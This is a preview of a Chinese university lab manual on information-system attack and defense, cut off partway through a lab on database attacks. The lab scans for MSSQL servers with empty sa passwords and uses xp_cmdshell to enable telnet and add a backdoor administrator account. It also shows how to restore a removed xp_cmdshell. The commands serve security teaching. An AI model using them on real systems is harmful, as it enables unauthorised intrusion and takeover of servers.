网站大量收购闲置独家精品文档,联系QQ:2885784924

信息系统攻防与对抗综合实验指导书12.doc

信息系统攻防与对抗综合实验指导书12.doc

  1. 1、本文档共54页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
PAGE PAGE 53 信息工程学院实验指导书系列 信息攻防与对抗实验指导书 信息攻防与对抗实验指导书 信息安全技术实验手册 2015-2016-2 信息安全技术实验手册 2015-2016-2 东莞立 目 录 TOC \o 1-3 \h \z 前 言 2 目 录 3 实验一 针对数据库的攻击和防御 4 一、实验目的 4 二、实验内容 4 三、实验环境 4 四、实验过程 4 五、思考题 20 实验二 针对操作系统的攻击和防御 21 一、实验目的 21 二、实验内容 21 三、实验环境 21 四、实验过程 21 五、思考题 38 实验三 针对网络协议的攻击和防御 39 一、实验目的 39 二、实验内容 39 三、实验环境 39 四、实验过程 39 五、思考题 49 实验四 综合攻击和综合防御 50 一、实验目的 50 二、实验内容 50 三、实验环境 50 四、实验过程 50 五、思考题 51 附录 52 一、手工注入脚本命令 52 实验一 针对数据库的攻击和防御 一、实验目的 1. 认识对数据库的几种攻击方法: 弱口令攻击,溢出攻击和注入攻击。 2. 掌握数据库的安全设置方法。 二、实验内容 练习使用对数据库的几种攻击方法: 弱口令攻击,溢出攻击和注入攻击,了解这几种攻击方法攻击成功的环境要求,进而掌握数据库的安全设置方法,积极防御,保护数据的安全。 三、实验环境 1台安装Windows2000/XP/2003操作系统的计算机,磁盘格式配置为NTFS,搭建一个access+asp,mssql+asp,php+mysql的web实验环境 注 :(mssql没打sp4补丁)。一台mssql服务器,开放远程连接和sa密码为空。 四、实验过程 (一)针对数据库的攻击 1. 弱口令攻击(Sa空口令入侵) 工具:Windows NT/2000 自动攻击探测机, SQLTools.exe。 原理:由于管理员的疏忽或者安全意识不强没有设置sa密码,并且可以远程连接,这时我们就利用sa权限(系统权限)进行入侵。 实验配置:一台mssql服务器,开放远程连接和sa密码为空。 利用windows NT/2000 自动攻击探测机扫描网段,找出空口令的mssql服务器,再用SQL综合利用工具来进行连接执行相应的系统命令。 利用系统存储过程xp_cmdshell执行dos命令,然后做进一步的入侵。 例如: 在SQL综合利用工具,执行相应的命令: net start telnet????????????????????????//开telnet服务; net user test test /add???????????????//添加用户test密码为test; net localgroup administrators test /add??????//将帐号test升级为管理员; 如果发现执行不了相关的命令,有可能是xp_cmdshell被删,我们可以用下面的进行恢复: 常见情况恢复执行xp_cmdshell: 1)未能找到存储过程master..xp_cmdshell. 恢复方法:查询分析器(或者sqltools.exe)连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =xplog70.dlldeclare @o int 第二步执行:sp_addextendedproc xp_cmdshell, xpsql70.dll 然后按F5键命令执行完毕。 2)无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) 恢复方法:查询分析器连接后, 第一步执行:sp_dropextendedproc xp_cmdshell 第二步执行:sp_addextendedproc xp_cmdshell, xpsql70.dll 然后按F5键命令执行完毕。 3)无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法:查询分析器连接后, 第一步执行:exec sp_dropextendedproc xp_cmdshell

文档评论(0)

***** + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档